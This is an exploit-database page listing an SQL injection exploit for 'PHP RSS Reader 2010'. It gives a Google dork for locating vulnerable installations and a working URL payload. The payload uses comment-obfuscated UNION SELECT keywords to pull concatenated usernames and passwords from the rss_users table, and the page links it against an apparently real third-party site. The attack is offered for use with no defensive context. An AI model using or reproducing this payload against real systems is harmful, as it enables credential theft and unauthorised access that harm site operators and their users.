[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP RSS Reader 2010 - SQL Injection Vulnerability

Author
rDNix
Risk
[
Security Risk High
]
0day-ID
0day-ID-21434
Category
web applications
Date add
01-11-2013
Platform
php
# Exploit Title: [PHP RSS READER 2010 SQLI]
# Google Dork: [Copyright 2010 - Powered By - PHP RSS Reader]
# Date: [28/10/2013]
# Exploit Author: [rDNix]
# Vendor Homepage: [http://www.phprssreader.com/]
# Version: [2010]
 
Exploit :-
 
http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+<http://www.kt.com.kw/read2/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+>
 
 
By : rDNix
Contact : mynamemishal@gmail.com

#  0day.today [2024-10-06]  #